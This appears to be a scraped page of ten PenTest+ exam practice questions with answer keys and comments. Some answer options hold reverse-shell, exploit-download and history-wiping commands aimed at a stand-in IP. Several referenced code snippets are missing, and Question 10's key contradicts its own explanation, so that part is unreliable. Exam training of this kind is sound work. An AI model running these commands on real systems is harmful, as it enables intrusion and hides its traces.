CompTIA PT0-002 Exam Practice Questions (P. 1)
- Full Access (448 questions)
- Six months of Premium Access
- Access to one million comments
- Seamless ChatGPT Integration
- Ability to download PDF files
- Anki Flashcard files for revision
- No Captcha & No AdSense
- Advanced Exam Configuration
Question #1
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
- Achmod u+x script.shMost Voted
- Bchmod u+e script.sh
- Cchmod o+e script.sh
- Dchmod o+x script.sh
Correct Answer:
A
Reference:
https://newbedev.com/chmod-u-x-versus-chmod-x
A
Reference:
https://newbedev.com/chmod-u-x-versus-chmod-x

send
light_mode
delete
Question #2
A penetration tester gains access to a system and establishes persistence, and then run the following commands:

Which of the following actions is the tester MOST likely performing?

Which of the following actions is the tester MOST likely performing?
- ARedirecting Bash history to /dev/null
- BMaking a copy of the user's Bash history to further enumeration
- CCovering tracks by clearing the Bash historyMost Voted
- DMaking decoy files on the system to confuse incident responders
Correct Answer:
C
Reference:
https://null-byte.wonderhowto.com/how-to/clear-logs-bash-history-hacked-linux-systems-cover- your-tracks-remain-undetected-0244768/
C
Reference:
https://null-byte.wonderhowto.com/how-to/clear-logs-bash-history-hacked-linux-systems-cover- your-tracks-remain-undetected-0244768/
send
light_mode
delete
Question #3
A compliance-based penetration test is primarily concerned with:
- Aobtaining PII from the protected network.
- Bbypassing protection on edge devices.
- Cdetermining the efficacy of a specific set of security standards.Most Voted
- Dobtaining specific information from the protected network.
Correct Answer:
C
C

Correct choice: C, which clearly explains that a compliance-based penetration test targets the effectiveness of set security measures and regulations like HIPAA or PCI-DSS. Its goal isn't primarily about extracting PII or other specific data from the network, nor is it about bypassing network protections. This type of pen test plays a crucial role in ensuring that organizations meet requisite security standards and can efficiently safeguard sensitive data from vulnerabilities. Hence, the essence of a compliance-based pen test is not just to find vulnerabilities but to confirm adherence to specific, prescribed security standards.
send
light_mode
delete
Question #4
A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel.
Which of the following would the tester MOST likely describe as a benefit of the framework?
Which of the following would the tester MOST likely describe as a benefit of the framework?
- AUnderstanding the tactics of a security intrusion can help disrupt them.Most Voted
- BScripts that are part of the framework can be imported directly into SIEM tools.
- CThe methodology can be used to estimate the cost of an incident better.
- DThe framework is static and ensures stability of a security program over time.
Correct Answer:
A
Reference:
https://attack.mitre.org/
A
Reference:
https://attack.mitre.org/

send
light_mode
delete
Question #5
Which of the following BEST describe the OWASP Top 10? (Choose two.)
- AThe most critical risks of web applicationsMost Voted
- BA list of all the risks of web applications
- CThe risks defined in order of importanceMost Voted
- DA web-application security standard
- EA risk-governance and compliance framework
- FA checklist of Apache vulnerabilities
Correct Answer:
AC
Reference:
https://www.synopsys.com/glossary/what-is-owasp-top-10.html
AC
Reference:
https://www.synopsys.com/glossary/what-is-owasp-top-10.html

send
light_mode
delete
Question #6
A penetration tester discovered a vulnerability that provides the ability to upload to a path via discovery traversal. Some of the files that were discovered through this vulnerability are:

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?
- AEdit the discovered file with one line of code for remote callback.
- BDownload .pl files and look for usernames and passwords.
- CEdit the smb.conf file and upload it to the server.Most Voted
- DDownload the smb.conf file and look at configurations.
Correct Answer:
C
C
send
light_mode
delete
Question #7
A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.
Which of the following should the tester verify FIRST to assess this risk?
Which of the following should the tester verify FIRST to assess this risk?
- AWhether sensitive client data is publicly accessibleMost Voted
- BWhether the connection between the cloud and the client is secure
- CWhether the client's employees are trained properly to use the platform
- DWhether the cloud applications were developed using a secure SDLC
Correct Answer:
A
A

Absolutely hitting the nail on the head, focusing on whether sensitive client data is publicly accessible is crucial when assessing cloud data security. Starting off with testing if sensitive data can be accessed by unauthorized parties addresses the most immediate and impactful risk. Plus, it helps prioritize any subsequent testing, like verifying secure connections or the integrity of app development in cloud environments. This not only checks for potential high-impact vulnerabilities but aligns perfectly with the core objectives of any thorough security audit. Remember, starting with what could cause the biggest disaster is always smart.
send
light_mode
delete
Question #8
A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?
Which of the following commands could be used to download a file named exploit to a target machine for execution?
- Anc 10.10.51.50 9891 < exploit
- Bpowershell -exec bypass -f \\10.10.51.50\9891
- Cbash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit
- Dwget 10.10.51.50:9891/exploitMost Voted
Correct Answer:
D
D

The correct answer is [D], utilizing the wget command to download the file from the HTTP server initiated with the command "python -m SimpleHTTPServer 9891." This server setup hosts the file at the IP address 10.10.51.50 on port 9891. The wget tool specifically addresses the task of downloading files over network protocols like HTTP, which is precisely what is required here for retrieving the exploit file. Options A, B, and C don't serve the purpose of downloading files from a web server directly and thus are inappropriate choices in this scenario.
send
light_mode
delete
Question #9
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:

Which of the following commands should the penetration tester run post-engagement?

Which of the following commands should the penetration tester run post-engagement?
- Agrep -v apache ~/bash_history > ~/.bash_history
- Brm -rf /tmp/apacheMost Voted
- Cchmod 600 /tmp/apache
- Dtaskkill /IM ג€apacheג€ /F
Correct Answer:
B
B
send
light_mode
delete
Question #10
Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?
- AExecutive summary of the penetration-testing methods used
- BBill of materials including supplies, subcontracts, and costs incurred during assessment
- CQuantitative impact assessments given a successful software compromise
- DCode context for instances of unsafe typecasting operationsMost Voted
Correct Answer:
C
C

In the context of a static application-security test aimed at developers, providing actionable insights directly related to their domain of expertise is crucial. When presenting the final report, including detailed code context, specifically for instances of unsafe typecasting operations, becomes essential. This information is not only pertinent but allows developers to directly understand and remediate the vulnerabilities, thus enhancing the application's security more effectively than merely presenting quantitative impact assessments. Such focused reporting ensures developers can apply the specified recommendations with clarity and precision.
send
light_mode
delete
All Pages